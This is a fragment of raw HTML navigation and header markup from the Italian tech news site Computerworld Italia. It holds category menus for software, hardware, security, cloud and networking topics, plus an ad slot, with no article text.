	<li id="menu-item-106282" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106282"><a href="https://www.cwi.it/mobile-wireless/gestione-dispositivi-mobili-mdm">Mobile Device Management</a></li>
	<li id="menu-item-106283" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106283"><a href="https://www.cwi.it/mobile-wireless/pagamenti-mobile">Pagamenti Mobile</a></li>
	<li id="menu-item-106284" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106284"><a href="https://www.cwi.it/mobile-wireless/sicurezza-mobile">Sicurezza Mobile</a></li>
	<li id="menu-item-106287" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106287"><a href="https://www.cwi.it/mobile-wireless/tlc-e-internet-provider">TLC e Internet Provider</a></li>
</ul>
</li>
<li id="menu-item-106288" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-106288"><a title="Sicurezza informatica" href="https://www.cwi.it/sicurezza">Sicurezza</a>
<ul class="sub-menu">
	<li id="menu-item-106292" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106292"><a href="https://www.cwi.it/networking/sicurezza-di-rete">Sicurezza di Rete</a></li>
	<li id="menu-item-106290" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106290"><a href="https://www.cwi.it/cloud-computing/sicurezza-cloud">Sicurezza Cloud</a></li>
	<li id="menu-item-106289" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106289"><a href="https://www.cwi.it/sicurezza/sicurezza-applicazioni">Sicurezza Applicazioni</a></li>
	<li id="menu-item-106291" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106291"><a href="https://www.cwi.it/sicurezza/sicurezza-dei-dati">Sicurezza dei Dati</a></li>
	<li id="menu-item-106293" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106293"><a href="https://www.cwi.it/mobile-wireless/sicurezza-mobile">Sicurezza Mobile</a></li>
	<li id="menu-item-106294" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106294"><a href="https://www.cwi.it/sicurezza/endpoint-security">Endpoint Security</a></li>
	<li id="menu-item-106295" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106295"><a href="https://www.cwi.it/sicurezza/cybercrimine-hacking">Cybercrimine &#038; Hacking</a></li>
	<li id="menu-item-106299" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106299"><a href="https://www.cwi.it/sicurezza/malware-vulnerabilita">Malware &#038; Vulnerabilità</a></li>
	<li id="menu-item-106296" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106296"><a href="https://www.cwi.it/sicurezza/cyberwarfare">Cyberwarfare</a></li>
	<li id="menu-item-106297" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106297"><a href="https://www.cwi.it/sicurezza/privacy">Privacy</a></li>
	<li id="menu-item-106298" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106298"><a title="Crittografia" href="https://www.cwi.it/sicurezza/cifratura">Crittografia</a></li>
	<li id="menu-item-106300" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106300"><a href="https://www.cwi.it/sicurezza/disaster-recovery-e-business-continuity">Disaster Recovery e Business Continuity</a></li>
	<li id="menu-item-106301" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106301"><a href="https://www.cwi.it/sicurezza/compliance-e-regolamenti">Compliance e Regolamenti</a></li>
</ul>
</li>
<li id="menu-item-106302" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-106302"><a title="Cloud Computing" href="https://www.cwi.it/cloud-computing">Cloud</a>
<ul class="sub-menu">
	<li id="menu-item-106303" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106303"><a href="https://www.cwi.it/cloud-computing/cloud-ibrido">Cloud ibrido</a></li>
	<li id="menu-item-106304" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106304"><a href="https://www.cwi.it/cloud-computing/cluod-privato">Cloud Privato</a></li>
	<li id="menu-item-106305" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106305"><a href="https://www.cwi.it/cloud-computing/cloud-pubblico">Cloud Pubblico</a></li>
	<li id="menu-item-106306" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106306"><a href="https://www.cwi.it/cloud-computing/cloud-storage">Cloud Storage</a></li>
	<li id="menu-item-106307" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106307"><a href="https://www.cwi.it/cloud-computing/sicurezza-cloud">Sicurezza Cloud</a></li>
</ul>
</li>
<li id="menu-item-106308" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-106308"><a title="Data Center" href="https://www.cwi.it/data-center">Data Center</a>
<ul class="sub-menu">
	<li id="menu-item-106312" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106312"><a href="https://www.cwi.it/data-center/gestione-infrastruttura">Gestione infrastruttura</a></li>
	<li id="menu-item-106313" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106313"><a href="https://www.cwi.it/data-center/mainframe">Mainframe</a></li>
	<li id="menu-item-106311" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106311"><a href="https://www.cwi.it/data-center/high-performance-computing-hpc">High Performance Computing (HPC)</a></li>
	<li id="menu-item-106309" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106309"><a href="https://www.cwi.it/data-center/storage">Storage</a></li>
	<li id="menu-item-106315" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106315"><a href="https://www.cwi.it/data-center/virtualizzazione">Virtualizzazione</a></li>
	<li id="menu-item-106310" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106310"><a href="https://www.cwi.it/data-center/disaster-recovery">Disaster Recovery</a></li>
	<li id="menu-item-106314" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106314"><a href="https://www.cwi.it/data-center/green-it">Green IT</a></li>
</ul>
</li>
<li id="menu-item-106316" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-106316"><a title="Networking" href="https://www.cwi.it/networking">Networking</a>
<ul class="sub-menu">
	<li id="menu-item-106319" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106319"><a href="https://www.cwi.it/networking/hardware-di-rete">Hardware di Rete</a></li>
	<li id="menu-item-106321" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106321"><a href="https://www.cwi.it/networking/software-di-rete">Software di Rete</a></li>
	<li id="menu-item-106322" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106322"><a href="https://www.cwi.it/networking/reti-wireless">Reti Wireless</a></li>
	<li id="menu-item-106318" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106318"><a href="https://www.cwi.it/networking/lan-wan">LAN &#038; WAN</a></li>
	<li id="menu-item-106323" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106323"><a href="https://www.cwi.it/networking/broadband">Broadband</a></li>
	<li id="menu-item-106320" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106320"><a href="https://www.cwi.it/networking/sicurezza-di-rete">Sicurezza di Rete</a></li>
	<li id="menu-item-106317" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106317"><a href="https://www.cwi.it/networking/software-defined-networking">Software Defined Networking</a></li>
</ul>
</li>
<li id="menu-item-106325" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-106325"><a title="Big Data, Analytics e Infrastruttura" href="https://www.cwi.it/big-data">Big data</a>
<ul class="sub-menu">
	<li id="menu-item-106326" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106326"><a href="https://www.cwi.it/big-data/big-data-analytics">Big Data Analytics</a></li>
	<li id="menu-item-106324" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106324"><a href="https://www.cwi.it/big-data/applicazioni-big-data">Applicazioni Big Data</a></li>
	<li id="menu-item-106327" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106327"><a href="https://www.cwi.it/big-data/infrastruttura-big-data">Infrastruttura Big Data</a></li>
</ul>
</li>
<li id="menu-item-106328" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-106328"><a title="Innovazione Business e Digital Transformation" href="https://www.cwi.it/tecnologie-emergenti">Innovazione</a>
<ul class="sub-menu">
	<li id="menu-item-106331" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106331"><a href="https://www.cwi.it/tecnologie-emergenti/internet-of-things">Internet of Things</a></li>
	<li id="menu-item-106335" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106335"><a href="https://www.cwi.it/tecnologie-emergenti/intelligenza-artificiale">Intelligenza Artificiale</a></li>
	<li id="menu-item-112454" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-112454"><a href="https://www.cwi.it/tecnologie-emergenti/blockchain">Blockchain</a></li>
	<li id="menu-item-107642" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-107642"><a href="https://www.cwi.it/tecnologie-emergenti/realta-virtuale">Realtà Virtuale</a></li>
	<li id="menu-item-106329" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106329"><a href="https://www.cwi.it/tecnologie-emergenti/stampa-3d">Stampa 3D</a></li>
	<li id="menu-item-106338" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106338"><a title="wearables" href="https://www.cwi.it/tecnologie-emergenti/computer-indossabili">Indossabili</a></li>
	<li id="menu-item-106333" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106333"><a href="https://www.cwi.it/tecnologie-emergenti/robotica">Robotica</a></li>
	<li id="menu-item-106334" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106334"><a href="https://www.cwi.it/tecnologie-emergenti/tecnologia-aerospaziale">Tecnologia aerospaziale</a></li>
	<li id="menu-item-106330" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106330"><a href="https://www.cwi.it/tecnologie-emergenti/ambiente">Ambiente</a></li>
</ul>
</li>
<li id="menu-item-106332" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106332"><a title="Internet of Things" href="https://www.cwi.it/tecnologie-emergenti/internet-of-things">IoT</a></li>
<li id="menu-item-106336" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106336"><a title="Intelligenza Artificiale" href="https://www.cwi.it/tecnologie-emergenti/intelligenza-artificiale">AI</a></li>
<li id="menu-item-106339" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-106339"><a title="Strategia Digital e ICT" href="https://www.cwi.it/strategia-it">Strategia IT</a>
<ul class="sub-menu">
	<li id="menu-item-106341" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106341"><a href="https://www.cwi.it/strategia-it/acquisti-e-procurement">Acquisti e Procurement</a></li>
	<li id="menu-item-106347" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106347"><a href="https://www.cwi.it/management-it/outsourcing">Outsourcing</a></li>
	<li id="menu-item-106349" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106349"><a href="https://www.cwi.it/management-it/project-management-it">Project Management IT</a></li>
	<li id="menu-item-106352" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106352"><a href="https://www.cwi.it/management-it">Management IT</a></li>
	<li id="menu-item-106342" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106342"><a href="https://www.cwi.it/strategia-it/organizzazione-it">Organizzazione IT</a></li>
	<li id="menu-item-106348" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106348"><a href="https://www.cwi.it/management-it/personale-it">Personale IT</a></li>
	<li id="menu-item-106350" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106350"><a href="https://www.cwi.it/management-it/skill-it-e-formazione">Skill IT e Formazione</a></li>
	<li id="menu-item-106343" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106343"><a href="https://www.cwi.it/strategia-it/innovazione">Innovazione IT</a></li>
	<li id="menu-item-106340" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106340"><a href="https://www.cwi.it/strategia-it/il-ruolo-del-cio">Il ruolo del CIO</a></li>
	<li id="menu-item-106344" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106344"><a href="https://www.cwi.it/strategia-it/leadership-management">Leadership/Management</a></li>
	<li id="menu-item-106345" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106345"><a href="https://www.cwi.it/strategia-it/industria-it">Industria IT</a></li>
	<li id="menu-item-106346" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106346"><a href="https://www.cwi.it/management-it/carriere-it">Carriere IT</a></li>
	<li id="menu-item-106351" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106351"><a href="https://www.cwi.it/management-it/trasformazione-it">Trasformazione nell&#8217;IT</a></li>
</ul>
</li>
<li id="menu-item-106353" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-106353"><a title="White Paper Informatica" href="https://www.cwi.it/c/risorse/white-paper">White Paper</a></li>
<li id="menu-item-106573" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-106573"><a href="https://www.cwi.it/cio">CIO</a></li>
<li id="menu-item-106880" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-106880"><a href="http://www.cwi.it/go/newsletter-subscribe/">NEWSLETTER</a></li>
</ul></div>    </div>
</div>    </div>

        <div class="td-transition-content-and-menu td-content-wrap">



<!--
Header style 1
-->

<div class="td-header-container td-header-wrap td-header-style-1">
    <div class="td-header-row td-header-top-menu">
        
<div class="td-header-sp-top-menu">

    <div class="menu-top-container"><ul id="menu-network" class="top-header-menu"><li id="menu-item-114" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-first td-menu-item td-normal-menu menu-item-114"><a href="http://bimag.it/" class="external" rel="nofollow">Bimag</a></li>
<li id="menu-item-108" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-108"><a href="http://tech-plus.it/" class="external" rel="nofollow">TechPlus</a></li>
<li id="menu-item-110" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-110"><a href="http://foodhospitality.it/" class="external" rel="nofollow">Foodhospitality</a></li>
<li id="menu-item-112" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-112"><a href="http://www.whoswho.it/" class="external" rel="nofollow">WhosWho</a></li>
<li id="menu-item-113" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-113"><a href="http://www.expopage.net/" class="external" rel="nofollow">Expopage</a></li>
</ul></div></div>
            </div>


    <div class="td-header-row td-header-header">
        <div class="td-header-sp-logo">
                            <!--a itemprop="url" href="https://www.cwi.it/"><img src="https://static.cwi.it/wp-content/uploads/2015/07/cwi_low.png" alt="Computerworld Italia - www.cwi.it" title="Computerworld Italia - www.cwi.it"/></a>
        <meta itemprop="name" content="Computerworld Italia"-->
        <a href="https://www.cwi.it/"><img src="https://static.cwi.it/wp-content/uploads/2015/07/cwi_low.png" alt="Computerworld Italia - www.cwi.it" title="Computerworld Italia - www.cwi.it"/></a>
        <meta content="Computerworld Italia">
            </div>
        <div class="td-header-sp-ads">
            
<div class="td-header-ad-wrap  td-ad-m td-ad-tp td-ad-p">
    
<!-- Beginning Async AdSlot 1 for Ad unit CWI/Hardware  ### size: [[728,90]] -->
<!-- Adslot's refresh function: googletag.pubads().refresh([gptadslots[1]]) -->
<div id='div-gpt-ad-795412788689030374-1'>
	<script type='text/javascript'>
		googletag.cmd.push(function() { googletag.display('div-gpt-ad-795412788689030374-1'); });
		//setInterval(function(){googletag.pubads().refresh([gptadslots[1]]);}, 60000);
	</script>
</div>
<!-- End AdSlot 1 -->
    
</div>        </div>
    </div>
    <div class="td-header-menu-wrap">
        <div class="td-header-row td-header-border td-header-main-menu">
            <div id="td-header-menu" role="navigation">
    <div id="td-top-mobile-toggle"><a rel="nofollow" href="#"><i class="td-icon-font td-icon-mobile"></i></a></div>
    <div class="td-main-menu-logo">
                        <!--a itemprop="url" href="https://www.cwi.it/"><img src="https://static.cwi.it/wp-content/uploads/2015/07/cwi_low.png" alt="Computerworld Italia - www.cwi.it" title="Computerworld Italia - www.cwi.it"/></a>
        <meta itemprop="name" content="Computerworld Italia"-->
        <a rel="nofollow" href="https://www.cwi.it/"><img src="https://static.cwi.it/wp-content/uploads/2015/07/cwi_low.png" alt="Computerworld Italia - www.cwi.it" title="Computerworld Italia - www.cwi.it"/></a>
        <meta content="Computerworld Italia">
        </div>
    <div class="menu-principale-2017-container"><ul id="menu-principale-2018" class="sf-menu"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-first td-menu-item td-normal-menu menu-item-106235"><a rel="nofollow" title="Software Business" href="https://www.cwi.it/applicazioni-enterprise">Software</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106236"><a rel="nofollow" href="https://www.cwi.it/applicazioni-enterprise/app-desktop">App Desktop</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106241"><a rel="nofollow" href="https://www.cwi.it/applicazioni-enterprise/office">Office</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106237"><a rel="nofollow" href="https://www.cwi.it/applicazioni-enterprise/architettura-enterprise">Architettura Enterprise</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106244"><a rel="nofollow" href="https://www.cwi.it/applicazioni-enterprise/gestione-database">Database</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106243"><a rel="nofollow" href="https://www.cwi.it/applicazioni-enterprise/gestionali">Gestionali</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106238"><a rel="nofollow" href="https://www.cwi.it/applicazioni-enterprise/business-intelligence-bi">Business Intelligence (BI)</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106240"><a rel="nofollow" href="https://www.cwi.it/applicazioni-enterprise/crm">CRM</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106242"><a rel="nofollow" href="https://www.cwi.it/applicazioni-enterprise/enterprise-resource-planning-erp">Enterprise Resource Planning (ERP)</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106239"><a rel="nofollow" href="https://www.cwi.it/applicazioni-enterprise/contentdocument-management">Content/Document Management</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106251"><a rel="nofollow" href="https://www.cwi.it/applicazioni-enterprise/unified-communications-uc">Unified Communications (UC)</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106245"><a rel="nofollow" href="https://www.cwi.it/applicazioni-enterprise/open-source">Open Source</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106250"><a rel="nofollow" href="https://www.cwi.it/applicazioni-enterprise/software-as-a-service-saas">Software as a Service (SaaS)</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106249"><a rel="nofollow" href="https://www.cwi.it/applicazioni-enterprise/collaborazione">Software di Collaborazione</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106246"><a rel="nofollow" href="https://www.cwi.it/applicazioni-enterprise/integrazione-di-servizi">Integrazione di servizi</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106247"><a rel="nofollow" href="https://www.cwi.it/applicazioni-enterprise/sviluppo-app">Sviluppo App</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106248"><a rel="nofollow" href="https://www.cwi.it/sviluppo-software">Sviluppo software</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children td-menu-item td-normal-menu menu-item-106252"><a rel="nofollow" title="Hardware, pc, processori, server, ssd" href="https://www.cwi.it/hardware">Hardware</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106264"><a rel="nofollow" href="https://www.cwi.it/hardware/pc-windows">PC Windows</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106254"><a rel="nofollow" href="https://www.cwi.it/hardware/apple-mac">Apple Mac</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106253"><a rel="nofollow" href="https://www.cwi.it/hardware/notebook">Notebook</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106259"><a rel="nofollow" href="https://www.cwi.it/hardware/pc-linux">PC Linux</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106255"><a rel="nofollow" href="https://www.cwi.it/hardware/chrome-os">ChromeBook</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106262"><a rel="nofollow" href="https://www.cwi.it/hardware/server">Server</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106257"><a rel="nofollow" href="https://www.cwi.it/hardware/periferiche-pc">Periferiche PC</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106263"><a rel="nofollow" href="https://www.cwi.it/hardware/dischi-ssd">Dischi SSD</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106258"><a rel="nofollow" href="https://www.cwi.it/hardware/processori-pc-e-server">Processori PC e server</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children td-menu-item td-normal-menu menu-item-106269"><a rel="nofollow" title="Sistemi Operativi" href="https://www.cwi.it/sistemi-operativi">Sistemi</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106265"><a rel="nofollow" href="https://www.cwi.it/sistemi-operativi/windows">Windows</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106266"><a rel="nofollow" href="https://www.cwi.it/sistemi-operativi/mac-os-x">macOS</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106267"><a rel="nofollow" href="https://www.cwi.it/sistemi-operativi/linux">Linux</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106268"><a rel="nofollow" href="https://www.cwi.it/sistemi-operativi/chrome-os-sistemi-operativi">Chrome OS</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children td-menu-item td-normal-menu menu-item-106270"><a rel="nofollow" title="Internet, Social Media, Online Marketing, Motori di Ricerca, Browser" href="https://www.cwi.it/internet">Internet</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106271"><a rel="nofollow" href="https://www.cwi.it/internet/e-commerce">E-commerce</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106272"><a rel="nofollow" href="https://www.cwi.it/internet/ricerca">Ricerca</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106273"><a rel="nofollow" href="https://www.cwi.it/internet/social-media">Social Media</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106274"><a rel="nofollow" href="https://www.cwi.it/internet/applicazioni-web">Applicazioni Web</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106275"><a rel="nofollow" href="https://www.cwi.it/internet/browser-web">Browser</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106276"><a rel="nofollow" href="https://www.cwi.it/internet/marketing-online">Digital Marketing</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children td-menu-item td-normal-menu menu-item-106277"><a rel="nofollow" title="Smartphone e tablet per lavorare" href="https://www.cwi.it/mobile-wireless">Mobile</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106285"><a rel="nofollow" href="https://www.cwi.it/mobile-wireless/smartphone">Smartphone</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106286"><a rel="nofollow" href="https://www.cwi.it/mobile-wireless/tablet">Tablet</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106278"><a rel="nofollow" href="https://www.cwi.it/mobile-wireless/apple-ios">Apple iOS</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106279"><a rel="nofollow" href="https://www.cwi.it/mobile-wireless/android">Android</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106280"><a rel="nofollow" href="https://www.cwi.it/mobile-wireless/windows-phone">Windows Phone</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-112257"><a rel="nofollow" href="https://www.cwi.it/mobile-wireless/5g">5G</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106281"><a rel="nofollow" href="https://www.cwi.it/mobile-wireless/app-mobile">App Mobile</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106282"><a rel="nofollow" href="https://www.cwi.it/mobile-wireless/gestione-dispositivi-mobili-mdm">Mobile Device Management</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106283"><a rel="nofollow" href="https://www.cwi.it/mobile-wireless/pagamenti-mobile">Pagamenti Mobile</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106284"><a rel="nofollow" href="https://www.cwi.it/mobile-wireless/sicurezza-mobile">Sicurezza Mobile</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106287"><a rel="nofollow" href="https://www.cwi.it/mobile-wireless/tlc-e-internet-provider">TLC e Internet Provider</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children td-menu-item td-normal-menu menu-item-106288"><a rel="nofollow" title="Sicurezza informatica" href="https://www.cwi.it/sicurezza">Sicurezza</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106292"><a rel="nofollow" href="https://www.cwi.it/networking/sicurezza-di-rete">Sicurezza di Rete</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106290"><a rel="nofollow" href="https://www.cwi.it/cloud-computing/sicurezza-cloud">Sicurezza Cloud</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106289"><a rel="nofollow" href="https://www.cwi.it/sicurezza/sicurezza-applicazioni">Sicurezza Applicazioni</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106291"><a rel="nofollow" href="https://www.cwi.it/sicurezza/sicurezza-dei-dati">Sicurezza dei Dati</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106293"><a rel="nofollow" href="https://www.cwi.it/mobile-wireless/sicurezza-mobile">Sicurezza Mobile</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106294"><a rel="nofollow" href="https://www.cwi.it/sicurezza/endpoint-security">Endpoint Security</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106295"><a rel="nofollow" href="https://www.cwi.it/sicurezza/cybercrimine-hacking">Cybercrimine &#038; Hacking</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106299"><a rel="nofollow" href="https://www.cwi.it/sicurezza/malware-vulnerabilita">Malware &#038; Vulnerabilità</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106296"><a rel="nofollow" href="https://www.cwi.it/sicurezza/cyberwarfare">Cyberwarfare</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106297"><a rel="nofollow" href="https://www.cwi.it/sicurezza/privacy">Privacy</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106298"><a rel="nofollow" title="Crittografia" href="https://www.cwi.it/sicurezza/cifratura">Crittografia</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-106300"><a rel="nofollow" href="https://www.cwi.it/sicurezza/disaster-recovery-e-business-continuity">Disaster Recovery e Business Continuity</a></li>
